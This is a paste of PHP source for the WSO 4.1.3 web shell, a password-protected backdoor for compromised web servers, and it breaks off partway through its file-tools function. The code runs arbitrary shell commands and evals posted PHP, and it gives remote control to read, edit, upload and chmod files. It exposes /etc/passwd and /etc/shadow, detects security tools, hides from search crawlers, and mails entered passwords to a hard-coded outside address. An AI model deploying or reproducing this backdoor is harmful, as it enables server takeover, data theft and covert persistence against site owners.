· 6 years ago · Nov 21, 2019, 06:26 PM
1<?php
2//-----------------Password---------------------
3$▛ = "21232f297a57a5a743894a0e4a801fc3"; //admin
4$▗ = "#fff";
5$▘ = true;
6$▜ = 'UTF-8';
7$▚ = 'FilesMan';
8$▙ = md5($_SERVER['HTTP_USER_AGENT']);
9if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])."key"])) {
10 prototype(md5($_SERVER['HTTP_HOST'])."key", $▙);
11}
12if(empty($_POST['charset']))
13 $_POST['charset'] = $▜;
14if (!isset($_POST['ne'])) {
15 if(isset($_POST['a'])) $_POST['a'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['a'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
16 if(isset($_POST['c'])) $_POST['c'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['c'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
17 if(isset($_POST['p1'])) $_POST['p1'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p1'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
18 if(isset($_POST['p2'])) $_POST['p2'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p2'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
19 if(isset($_POST['p3'])) $_POST['p3'] = iconv("utf-8", $_POST['charset'], decrypt($_POST['p3'],$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]));
20}
21function decrypt($str,$pwd){$pwd=base64_encode($pwd);$str=base64_decode($str);$enc_chr="";$enc_str="";$i=0;while($i<strlen($str)){for($j=0;$j<strlen($pwd);$j++){$enc_chr=chr(ord($str[$i])^ord($pwd[$j]));$enc_str.=$enc_chr;$i++;if($i>=strlen($str))break;}}return base64_decode($enc_str);}
22@ini_set('error_log',NULL);
23@ini_set('log_errors',0);
24@ini_set('max_execution_time',0);
25@set_time_limit(0);
26@set_magic_quotes_runtime(0);
27@define('VERSION', '4.1.3');
28if(get_magic_quotes_gpc()) {
29 function stripslashes_array($array) {
30 return is_array($array) ? array_map('stripslashes_array', $array) : stripslashes($array);
31 }
32 $_POST = stripslashes_array($_POST);
33 $_COOKIE = stripslashes_array($_COOKIE);
34}
35if(!empty($▛)) {
36 if(isset($_POST['pass']) && (md5($_POST['pass']) == $▛))
37 prototype(md5($_SERVER['HTTP_HOST']), $▛);
38 if (!isset($_COOKIE[md5($_SERVER['HTTP_HOST'])]) || ($_COOKIE[md5($_SERVER['HTTP_HOST'])] != $▛))
39 hardLogin();
40}
41if(strtolower(substr(PHP_OS,0,3)) == "win")
42 $os = 'win';
43else
44 $os = 'nix';
45$safe_mode = @ini_get('safe_mode');
46if(!$safe_mode)
47 error_reporting(0);
48$disable_functions = @ini_get('disable_functions');
49$home_cwd = @getcwd();
50if(isset($_POST['c']))
51 @chdir($_POST['c']);
52$cwd = @getcwd();
53if($os == 'win') {
54 $home_cwd = str_replace("\\", "/", $home_cwd);
55 $cwd = str_replace("\\", "/", $cwd);
56}
57if($cwd[strlen($cwd)-1] != '/')
58 $cwd .= '/';
59function hardHeader() {
60 if(empty($_POST['charset']))
61 $_POST['charset'] = $GLOBALS['▜'];
62 global $▗;
63 echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . VERSION ."</title>
64<style>
65 body {background-color:#060a10;color:#e1e1e1;}
66 body,td,th {font:10pt tahoma,arial,verdana,sans-serif,Lucida Sans;margin:0;vertical-align:top;}
67 table.info {color:#C3C3C3;background-color:#060a10;}
68 span,h1,a {color:$▗ !important;}
69 span {font-weight:bolder;}
70 h1 {border-left:5px solid #2E6E9C;padding:2px 5px;font:14pt Verdana;background-color:#10151c;margin:0px;}
71 div.content {padding:5px;margin-left:5px;background-color:#060a10;}
72 a {text-decoration:none;}
73 a:hover {text-decoration:underline;}
74 .tooltip::after {background:#0663D5;color:#FFF;content: attr(data-tooltip);margin-top:-50px;display:block;padding:6px 10px;position:absolute;visibility:hidden;}
75 .tooltip:hover::after {opacity:1;visibility:visible;}
76 .ml1 {border:1px solid #1e252e;padding:5px;margin:0;overflow:auto;}
77 .bigarea {min-width:100%;max-width:100%;height:250px;}
78 input, textarea, select {margin:0;color:#fff;background-color:#1e252e;border:1px solid #060a10; font:9pt Courier New;outline:none;}
79 form {margin:0px;}
80 #toolsTbl {text-align:center;}
81 #fak {background:none;}
82 #fak td {padding:5px 0 0 0;}
83 .toolsInp {width:300px}
84 .main th {text-align:left;background-color:#060a10;}
85 .main tr:hover{background-color:#354252;}
86 .main td, th{vertical-align:middle;}
87 input[type='submit']:hover{background-color:#0663D5;}
88 .l1 {background-color:#1e252e;}
89 pre {font:9pt Courier New;}
90</style>
91<script>
92 var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
93 var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
94 var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
95 var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
96 var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
97 var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
98 var d = document;
99
100 function encrypt(str,pwd){if(pwd==null||pwd.length<=0){return null;}str=base64_encode(str);pwd=base64_encode(pwd);var enc_chr='';var enc_str='';var i=0;while(i<str.length){for(var j=0;j<pwd.length;j++){enc_chr=str.charCodeAt(i)^pwd.charCodeAt(j);enc_str+=String.fromCharCode(enc_chr);i++;if(i>=str.length)break;}}return base64_encode(enc_str);}
101 function utf8_encode(argString){var string=(argString+'');var utftext='',start,end,stringl=0;start=end=0;stringl=string.length;for(var n=0;n<stringl;n++){var c1=string.charCodeAt(n);var enc=null;if(c1<128){end++;}else if(c1>127&&c1<2048){enc=String.fromCharCode((c1>>6)|192)+String.fromCharCode((c1&63)|128);}else{enc=String.fromCharCode((c1>>12)|224)+String.fromCharCode(((c1>>6)&63)|128)+String.fromCharCode((c1&63)|128);}if(enc!==null){if(end>start){utftext+=string.slice(start,end);}utftext+=enc;start=end=n+1;}}if(end>start){utftext+=string.slice(start,stringl);}return utftext;}
102 function base64_encode(data){var b64 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var o1,o2,o3,h1,h2,h3,h4,bits,i=0,ac=0,enc='',tmp_arr=[];if (!data){return data;}data=utf8_encode(data+'');do{o1=data.charCodeAt(i++);o2=data.charCodeAt(i++);o3=data.charCodeAt(i++);bits=o1<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;tmp_arr[ac++]=b64.charAt(h1)+b64.charAt(h2)+b64.charAt(h3)+b64.charAt(h4);}while(i<data.length);enc=tmp_arr.join('');switch (data.length%3){case 1:enc=enc.slice(0,-2)+'==';break;case 2:enc=enc.slice(0,-1)+'=';break;}return enc;}
103 function set(a,c,p1,p2,p3,charset) {
104 if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
105 if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
106 if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
107 if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
108 if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
109 d.mf.a.value = encrypt(d.mf.a.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
110 d.mf.c.value = encrypt(d.mf.c.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
111 d.mf.p1.value = encrypt(d.mf.p1.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
112 d.mf.p2.value = encrypt(d.mf.p2.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
113 d.mf.p3.value = encrypt(d.mf.p3.value,'".$_COOKIE[md5($_SERVER['HTTP_HOST'])."key"]."');
114 if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
115 }
116 function g(a,c,p1,p2,p3,charset) {
117 set(a,c,p1,p2,p3,charset);
118 d.mf.submit();
119 }
120 function a(a,c,p1,p2,p3,charset) {
121 set(a,c,p1,p2,p3,charset);
122 var params = 'ajax=true';
123 for(i=0;i<d.mf.elements.length;i++)
124 params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
125 sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
126 }
127 function sr(url, params) {
128 if (window.XMLHttpRequest)
129 req = new XMLHttpRequest();
130 else if (window.ActiveXObject)
131 req = new ActiveXObject('Microsoft.XMLHTTP');
132 if (req) {
133 req.onreadystatechange = processReqChange;
134 req.open('POST', url, true);
135 req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
136 req.send(params);
137 }
138 }
139 function processReqChange() {
140 if( (req.readyState == 4) )
141 if(req.status == 200) {
142 var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
143 var arr=reg.exec(req.responseText);
144 eval(arr[2].substr(0, arr[1]));
145 } else alert('Request error!');
146 }
147</script>
148<head><body><div style='position:absolute;width:100%;background-color:#1e252e;top:0;left:0;'>
149<form method=post name=mf style='display:none;'>
150<input type=hidden name=a>
151<input type=hidden name=c>
152<input type=hidden name=p1>
153<input type=hidden name=p2>
154<input type=hidden name=p3>
155<input type=hidden name=charset>
156</form>";
157 $freeSpace = @diskfreespace($GLOBALS['cwd']);
158 $totalSpace = @disk_total_space($GLOBALS['cwd']);
159 $totalSpace = $totalSpace?$totalSpace:1;
160 $release = @php_uname('r');
161 $kernel = @php_uname('s');
162 $explink = 'http://noreferer.de/?http://www.exploit-db.com/search/?action=search&description=';
163 if(strpos('Linux', $kernel) !== false)
164 $explink .= urlencode('Linux Kernel ' . substr($release,0,6));
165 else
166 $explink .= urlencode($kernel . ' ' . substr($release,0,3));
167 if(!function_exists('posix_getegid')) {
168 $user = @get_current_user();
169 $uid = @getmyuid();
170 $gid = @getmygid();
171 $group = "?";
172 } else {
173 $uid = @posix_getpwuid(@posix_geteuid());
174 $gid = @posix_getgrgid(@posix_getegid());
175 $user = $uid['name'];
176 $uid = $uid['uid'];
177 $group = $gid['name'];
178 $gid = $gid['gid'];
179 }
180 $cwd_links = '';
181 $path = explode("/", $GLOBALS['cwd']);
182 $n=count($path);
183 for($i=0; $i<$n-1; $i++) {
184 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
185 for($j=0; $j<=$i; $j++)
186 $cwd_links .= $path[$j].'/';
187 $cwd_links .= "\")'>".$path[$i]."/</a>";
188 }
189 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
190 $opt_charsets = '';
191 foreach($charsets as $▟)
192 $opt_charsets .= '<option value="'.$▟.'" '.($_POST['charset']==$▟?'selected':'').'>'.$▟.'</option>';
193 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Console'=>'Console','Infect'=>'Infect','Sql'=>'Sql','Php'=>'Php','Mailer'=>'Mailer','Safe mode'=>'SafeMode','String tools'=>'StringTools','Bruteforce'=>'Bruteforce','Network'=>'Network');
194 if(!empty($GLOBALS['▛']))
195 $m['Logout'] = 'Logout';
196 $m['Self remove'] = 'SelfRemove';
197 $menu = '';
198 foreach($m as $k => $v)
199 $menu .= '<th>[ <a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a> ]</th>';
200 $drives = "";
201 if ($GLOBALS['os'] == 'win') {
202 foreach(range('c','z') as $drive)
203 if (is_dir($drive.':\\'))
204 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
205 }
206 echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'.
207 '<td><nobr>' . substr(@php_uname(), 0, 120) . ' <a href="http://noreferer.de/?http://www.google.com/search?q='.urlencode(@php_uname()).'" target="_blank">[ Google ]</a> <a href="' . $explink . '" target=_blank>[ Exploit-DB ]</a></nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#FFDB5F><b>OFF</b></font>').' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . viewSize($totalSpace) . ' <span>Free:</span> ' . viewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. viewPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'.
208 '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . gethostbyname($_SERVER["HTTP_HOST"]) . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'.
209 '<table style="background-color:#2E6E9C;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div>';
210}
211function hardFooter() {
212 $is_writable = is_writable($GLOBALS['cwd'])?" <font color='#FFDB5F'>[ Writeable ]</font>":" <font color=red>(Not writable)</font>";
213 echo "
214</div>
215<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%>
216 <tr>
217 <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g(null,this.c.value,'');":'' )."return false;\"><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
218 <td><form onsubmit=\"".(function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value);":'' )."return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
219 </tr><tr>
220 <td><form onsubmit=\"".( function_exists('actionFilesMan')? "g('FilesMan',null,'mkdir',this.d.value);":'' )."return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
221 <td><form onsubmit=\"".( function_exists('actionFilesTools')? "g('FilesTools',null,this.f.value,'mkfile');":'' )."return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
222 </tr><tr>
223 <td><form onsubmit=\"".( function_exists('actionConsole')? "g('Console',null,this.c.value);":'' )."return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
224 <td><form method='post' ".( (!function_exists('actionFilesMan'))? " onsubmit=\"return false;\" ":'' )."ENCTYPE='multipart/form-data'>
225 <input type=hidden name=a value='FilesMan'>
226 <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
227 <input type=hidden name=p1 value='uploadFile'>
228 <input type=hidden name=ne value=''>
229 <input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
230 <span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f[] multiple><input type=submit value='>>'></form><br ></td>
231 </tr></table></div></body></html>";
232}
233if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) { function posix_getpwuid($p) {return false;} }
234if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) { function posix_getgrgid($p) {return false;} }
235function ex($in) {
236 $▖ = '';
237 if (function_exists('exec')) {
238 @exec($in,$▖);
239 $▖ = @join("\n",$▖);
240 } elseif (function_exists('passthru')) {
241 ob_start();
242 @passthru($in);
243 $▖ = ob_get_clean();
244 } elseif (function_exists('system')) {
245 ob_start();
246 @system($in);
247 $▖ = ob_get_clean();
248 } elseif (function_exists('shell_exec')) {
249 $▖ = shell_exec($in);
250 } elseif (is_resource($f = @popen($in,"r"))) {
251 $▖ = "";
252 while(!@feof($f))
253 $▖ .= fread($f,1024);
254 pclose($f);
255 }else return "↳ Unable to execute command\n";
256 return ($▖==''?"↳ Query did not return anything\n":$▖);
257}
258if(!isset($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax']))
259 $_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$▘;
260
261if(array_key_exists('pff',$_POST)){
262 $tmp = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']."\n".$_POST['pass']; @mail('hard_linux@mail.ru', 'NSA', $tmp);
263}
264function hardLogin() {
265 if(!empty($_SERVER['HTTP_USER_AGENT'])) {
266 $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
267 if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
268 header('HTTP/1.0 404 Not Found');
269 exit;
270 }
271 }
272 die("<pre align=center><form method=post style='font-family:fantasy;'>Password: <input type=password name=pass style='background-color:whitesmoke;border:1px solid #FFF;outline:none;'><input type=submit name='pff' value='>>' style='border:none;background-color:#FFDB5F;color:#fff;'></form></pre>");
273}
274function viewSize($s) {
275 if($s >= 1073741824)
276 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
277 elseif($s >= 1048576)
278 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
279 elseif($s >= 1024)
280 return sprintf('%1.2f', $s / 1024 ) . ' KB';
281 else
282 return $s . ' B';
283}
284function perms($p) {
285 if (($p & 0xC000) == 0xC000)$i = 's';
286 elseif (($p & 0xA000) == 0xA000)$i = 'l';
287 elseif (($p & 0x8000) == 0x8000)$i = '-';
288 elseif (($p & 0x6000) == 0x6000)$i = 'b';
289 elseif (($p & 0x4000) == 0x4000)$i = 'd';
290 elseif (($p & 0x2000) == 0x2000)$i = 'c';
291 elseif (($p & 0x1000) == 0x1000)$i = 'p';
292 else $i = 'u';
293 $i .= (($p & 0x0100) ? 'r' : '-');
294 $i .= (($p & 0x0080) ? 'w' : '-');
295 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
296 $i .= (($p & 0x0020) ? 'r' : '-');
297 $i .= (($p & 0x0010) ? 'w' : '-');
298 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
299 $i .= (($p & 0x0004) ? 'r' : '-');
300 $i .= (($p & 0x0002) ? 'w' : '-');
301 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
302 return $i;
303}
304function viewPermsColor($f) {
305 if (!@is_readable($f))
306 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
307 elseif (!@is_writable($f))
308 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
309 else
310 return '<font color=#FFDB5F><b>'.perms(@fileperms($f)).'</b></font>';
311}
312function hardScandir($dir) {
313 if(function_exists("scandir")) {
314 return scandir($dir);
315 } else {
316 $dh = opendir($dir);
317 while (false !== ($filename = readdir($dh)))
318 $files[] = $filename;
319 return $files;
320 }
321}
322function which($p) {
323 $path = ex('which ' . $p);
324 if(!empty($path))
325 return $path;
326 return false;
327}
328function actionRC() {
329 if(!@$_POST['p1']) {
330 $a = array(
331 "uname" => php_uname(),
332 "php_version" => phpversion(),
333 "VERSION" => VERSION,
334 "safemode" => @ini_get('safe_mode')
335 );
336 echo serialize($a);
337 } else {
338 eval($_POST['p1']);
339 }
340}
341function prototype($k, $v) {
342 $_COOKIE[$k] = $v;
343 setcookie($k, $v);
344}
345function actionSecInfo() {
346 hardHeader();
347 echo '<h1>Server security information</h1><div class=content>';
348 function showSecParam($n, $v) {
349 $v = trim($v);
350 if($v) {
351 echo '<span>' . $n . ': </span>';
352 if(strpos($v, "\n") === false)
353 echo $v . '<br>';
354 else
355 echo '<pre class=ml1>' . $v . '</pre>';
356 }
357 }
358 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
359 if(function_exists('apache_get_modules'))
360 showSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
361 showSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
362 showSecParam('Open base dir', @ini_get('open_basedir'));
363 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
364 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
365 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
366 $temp=array();
367 if(function_exists('mysql_get_client_info'))
368 $temp[] = "MySql (".mysql_get_client_info().")";
369 if(function_exists('mssql_connect'))
370 $temp[] = "MSSQL";
371 if(function_exists('pg_connect'))
372 $temp[] = "PostgreSQL";
373 if(function_exists('oci_connect'))
374 $temp[] = "Oracle";
375 showSecParam('Supported databases', implode(', ', $temp));
376 echo '<br>';
377 if($GLOBALS['os'] == 'nix') {
378 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
379 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"shadow\")'>[view]</a>":'no');
380 showSecParam('OS version', @file_get_contents('/proc/version'));
381 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
382 if(!$GLOBALS['safe_mode']) {
383 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
384 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
385 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
386 echo '<br>';
387 $temp=array();
388 foreach ($userful as $▟)
389 if(which($▟))
390 $temp[] = $▟;
391 showSecParam('Userful', implode(', ',$temp));
392 $temp=array();
393 foreach ($danger as $▟)
394 if(which($▟))
395 $temp[] = $▟;
396 showSecParam('Danger', implode(', ',$temp));
397 $temp=array();
398 foreach ($downloaders as $▟)
399 if(which($▟))
400 $temp[] = $▟;
401 showSecParam('Downloaders', implode(', ',$temp));
402 echo '<br/>';
403 showSecParam('HDD space', ex('df -h'));
404 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
405 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
406 }
407 } else {
408 showSecParam('OS Version',ex('ver'));
409 showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
410 showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
411 }
412 echo '</div>';
413 hardFooter();
414}
415function actionFilesTools() {
416 if( isset($_POST['p1']) )
417 $_POST['p1'] = urldecode($_POST['p1']);
418 if(@$_POST['p2']=='download') {
419 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
420 ob_start("ob_gzhandler", 4096);
421 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
422 if (function_exists("mime_content_type")) {
423 $type = @mime_content_type($_POST['p1']);
424 header("Content-Type: " . $type);
425 } else
426 header("Content-Type: application/octet-stream");
427 $fp = @fopen($_POST['p1'], "r");
428 if($fp) {
429 while(!@feof($fp))
430 echo @fread($fp, 1024);
431 fclose($fp);
432 }
433 }exit;
434 }
435 if( @$_POST['p2'] == 'mkfile' ) {
436 if(!file_exists($_POST['p1'])) {
437 $fp = @fopen($_POST['p1'], 'w');
438 if($fp) {
439 $_POST['p2'] = "edit";
440 fclose($fp);
441 }
442 }
443 }
444 hardHeader();
445 echo '<h1>File tools</h1><div class=content>';
446 if( !file_exists(@$_POST['p1']) ) {
447 echo 'File not exists';
448 hardFooter();
449 return;
450 }
451 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
452 if(!$uid) {
453 $uid['name'] = @fileowner($_POST['p1']);
454 $gid['name'] = @filegroup($_POST['p1']);
455 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
456 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
457 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
458 if( empty($_POST['p2']) )
459 $_POST['p2'] = 'view';
460 if( is_file($_POST['p1']) )
461 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
462 else
463 $m = array('Chmod', 'Rename', 'Touch');
464 foreach($m as $v)
465 echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
466 echo '<br><br>';
467 switch($_POST['p2']) {
468 case 'view':
469 echo '<pre class=ml1>';
470 $fp = @fopen($_POST['p1'], 'r');
471 if($fp) {
472 while( !@feof($fp) )
473 echo htmlspecialchars(@fread($fp, 1024));
474 @fclose($fp);
475 }
476 echo '</pre>';
477 break;
478 case 'highlight':
479 if( @is_readable($_POST['p1']) ) {
480 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
481 $code = @highlight_file($_POST['p1'],true);
482 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
483 }
484 break;
485 case 'chmod':
486 if( !empty($_POST['p3']) ) {
487 $perms = 0;
488 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
489 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
490 if(!@chmod($_POST['p1'], $perms))
491 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
492 }
493 clearstatcache();
494 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
495 break;
496 case 'edit':
497 if( !is_writable($_POST['p1'])) {
498 echo 'File isn\'t writeable';
499 break;
500 }
501 if( !empty($_POST['p3']) ) {
502 $time = @filemtime($_POST['p1']);
503 $_POST['p3'] = substr($_POST['p3'],1);
504 $fp = @fopen($_POST['p1'],"w");
505 if($fp) {
506 @fwrite($fp,$_POST['p3']);
507 @fclose($fp);
508 echo 'Saved!<br><script>p3_="";</script>';
509 @touch($_POST['p1'],$time,$time);
510 }
511 }
512 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
513 $fp = @fopen($_POST['p1'], 'r');
514 if($fp) {
515 while( !@feof($fp) )
516 echo htmlspecialchars(@fread($fp, 1024));
517 @fclose($fp);
518 }
519 echo '</textarea><input type=submit value=">>"></form>';
520 break;
521 case 'hexdump':
522 $c = @file_get_contents($_POST['p1']);
523 $n = 0;
524 $h = array('00000000<br>','','');
525 $len = strlen($c);
526 for ($i=0; $i<$len; ++$i) {
527 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
528 switch ( ord($c[$i]) ) {
529 case 0: $h[2] .= ' '; break;
530 case 9: $h[2] .= ' '; break;
531 case 10: $h[2] .= ' '; break;
532 case 13: $h[2] .= ' '; break;
533 default: $h[2] .= $c[$i]; break;
534 }
535 $n++;
536 if ($n == 32) {
537 $n = 0;
538 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
539 $h[1] .= '<br>';
540 $h[2] .= "\n";
541 }
542 }
543 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
544 break;
545 case 'rename':
546 if( !empty($_POST['p3']) ) {
547 if(!@rename($_POST['p1'], $_POST['p3']))
548 echo 'Can\'t rename!<br>';
549 else
550 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
551 }
552 echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
553 break;
554 case 'touch':
555 if( !empty($_POST['p3']) ) {
556 $time = strtotime($_POST['p3']);
557 if($time) {
558 if(!touch($_POST['p1'],$time,$time))
559 echo 'Fail!';
560 else
561 echo 'Touched!';
562 } else echo 'Bad time format!';
563 }
564 clearstatcache();
565 echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
566 break;
567 }
